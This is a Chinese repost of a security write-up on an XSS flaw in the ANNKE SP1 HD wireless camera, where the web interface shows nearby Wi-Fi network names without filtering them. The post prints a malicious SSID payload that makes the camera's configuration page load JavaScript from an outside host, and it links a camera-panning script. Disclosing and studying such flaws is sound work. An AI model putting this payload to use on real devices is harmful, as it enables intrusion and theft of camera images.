专栏首页it同路人如何通过XSS入侵网络摄像头

如何通过XSS入侵网络摄像头

1

Start

我们在ANNKE SP1 HD无线摄像头(固件版本v3.4.1.1604071109)中发现了一个风险较低但十分有趣的XSS。有趣的是,在Annke Web界面中查看可用的Wi-Fi接入点时会触发XSS

因此,如果在摄像头的WIFI范围内有如下SSID:

"<script src=//xjs.io></script>

当受害者访问无线配置页面时,SP1相机将加载并运行在http://xjs.io/上的JavaScript代码。这是因为他扫描了附近的无线网络,并将能够连接的SSID直接显示在了页面上

2

如何利用

为了验证我们的想法,我们编写一个脚本来从相机中窃取图像。

利用XSS获取图像

官方可能已经修复了它,显然,人们现在需要开始关心物理接近利用这个问题,虽然它并不是一个巨大的漏洞。但它确实说明供应商需要小心验证来自任何源的输入,而不仅仅是Web界面上的GET/POST参数

3

做点更有趣的事情

如果你想做点更有意思的事,可以使用这个脚本https://github.com/pentestpartners/bits-for-blog/blob/master/annke-spin.js让摄像头进行平移

附上代码:

本文翻译自:

https://www.pentestpartners.com/security-blog/nifty-xss-in-annke-sp1-hd-wireless-camera/

作者:物联网IOT安全 (文章转载请注明来自:IT同路人论坛)

本文分享自微信公众号 - it同路人(ittongluren),作者:年华不散场

原文出处及转载信息见文内详细说明,如有侵权,请联系 yunjia_community@tencent.com 删除。

原始发表时间:2019-04-29

本文参与腾讯云自媒体分享计划,欢迎正在阅读的你也加入,一起分享。

我来说两句

0 条评论
登录 后参与评论

相关文章

  • 在线cms识别|旁站|c段|信息泄露|工控|系统|物联网安全|cms漏洞扫描|端口扫描|待完善..

    微语:这是一个朋友弄的东西,征求对方同意的情况下排版了下,发了出来,有些许BUG,大牛可以的话,来完善完善。 这是一款线上工具箱,收集整理了一些渗透测试过程...

    ittongluren
  • windows蓝屏漏洞

    首先用第一个 格式化U盘 用win32 选择优盘 然后 ,选择tinyntfs。img镜像 然后你把刷好的U盘 随便查个windows电脑 如果开了...

    ittongluren
  • 我如何利用微信反弹shell

    最近刚好在忙一个程序的dll劫持测试,现在就随便拿一个程序来练练手。增加一下熟练度,此操作可用于维持后门!

    ittongluren
  • Jenkinsclient系列教程之查看基本信息(二)

    今天我们先不介绍组命令,先介绍第一层的COMMAND。这些命令基本用来查看各种信息。

    DevOps持续交付
  • 浅析内存屏障以及在java中的应用

    程序在运行时内存实际的访问顺序和程序代码编写的访问顺序不一定一致,这就是内存乱序访问。内存乱序访问行为出现的理由是为了提升程序运行时的性能。这种内存乱序问题主要...

    开发架构二三事
  • 博弈论笔记--02--学会换位思考

    Player1:S[i]={T,B} Player2:S[i]={L,C,R} U1(T,C)=11 U2(T,C)=3

    Enterprise_
  • Firefox信息泄漏漏洞的技术分析(CVE-2018-12387)

    研究发现,JavaScript JIT编辑器中的Array.prototype.push有多个存在安全问题的参数,而这些参数共同导致了这个信息泄漏漏洞的出现。这...

    FB客服
  • [android] 手机卫士保存安全号码

    调用ListView对象的setOnItemClickListener()方法,设置条目的点击事件,参数:OnItemClickListener对象

    陶士涵
  • 在安卓系统安装运行Metasploit并对windows进行永恒之蓝攻击

    Metasploit是一款强大的渗透测试平台,其中包括了很多渗透测试利器,简称MSF。今天我就演示如何在手机上运行Metasploit并且实现"永恒之蓝"渗透内...

    用户5878089
  • Python 捕捉traceback异常栈信息

    返回包含3个元素(type, value, traceback)的元组,提供关于当前正被处理的异常信息。如果异常没有被处理,返回包含3个None值的元组。

    授客

扫码关注云+社区

领取腾讯云代金券